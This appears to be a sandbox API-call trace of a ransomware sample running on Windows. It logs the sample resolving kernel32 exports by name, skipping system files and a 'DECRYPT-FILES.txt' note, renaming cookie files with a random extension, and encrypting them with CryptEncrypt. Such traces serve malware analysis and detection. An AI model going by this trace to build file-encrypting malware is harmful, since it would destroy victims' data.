[0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.476] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.476] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.476] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.476] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.476] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.476] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.476] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.476] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.476] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.476] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.476] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.476] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.476] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.476] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.477] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.477] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.477] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.477] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.477] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.477] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.477] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.477] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.477] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.477] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.477] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.477] lstrlenA (lpString="DELETEATOM") returned 10 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.477] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.477] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.477] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.477] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.477] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.477] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.477] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.478] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.478] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.478] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.478] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.478] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.478] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.478] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.478] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.478] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.478] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.478] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.478] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.478] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.478] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.478] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.478] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.478] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.479] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.479] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.479] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.479] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.479] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.479] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.479] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.479] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.479] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.479] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.479] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.479] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.479] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.479] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.479] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.479] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.479] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.479] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.479] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.480] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.480] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.480] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt") returned 112 [0079.480] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp") returned 120 [0079.480] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.evbelfp"), dwFlags=0x0) returned 1 [0079.481] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.481] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.481] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.481] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbfa5cef0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbfa5cef0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbfa5cef0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x76, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", cAlternateFileName="5PD7A3~1.TXT")) returned 1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="autorun.inf") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="boot.ini") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="desktop.ini") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="ntuser.dat") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="iconcache.db") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="bootsect.bak") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="thumbs.db") returned -1 [0079.482] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt", lpString2="Bootfont.bin") returned -1 [0079.482] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned 37 [0079.482] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.482] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.482] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.482] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.482] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.482] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned 37 [0079.482] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.482] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@m.exactag[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" [0079.482] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.482] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.483] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=118) returned 1 [0079.483] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.483] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.483] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.484] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.484] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.485] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.485] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.486] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.486] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.486] CloseHandle (hObject=0x464) returned 1 [0079.486] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.487] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.487] CloseHandle (hObject=0x0) returned 0 [0079.487] CloseHandle (hObject=0x460) returned 1 [0079.488] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.488] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.489] GetTickCount () returned 0x114c5cf [0079.489] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.489] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.489] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.489] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.489] lstrlenA (lpString="kernel32.dll") returned 12 [0079.490] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.490] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.490] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.490] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.490] lstrlenA (lpString="ADDATOMA") returned 8 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.490] lstrlenA (lpString="ADDATOMW") returned 8 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.490] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.490] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.490] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.490] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.490] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.490] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.490] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.490] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.490] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.490] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.490] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.490] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.490] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.491] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.491] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.491] 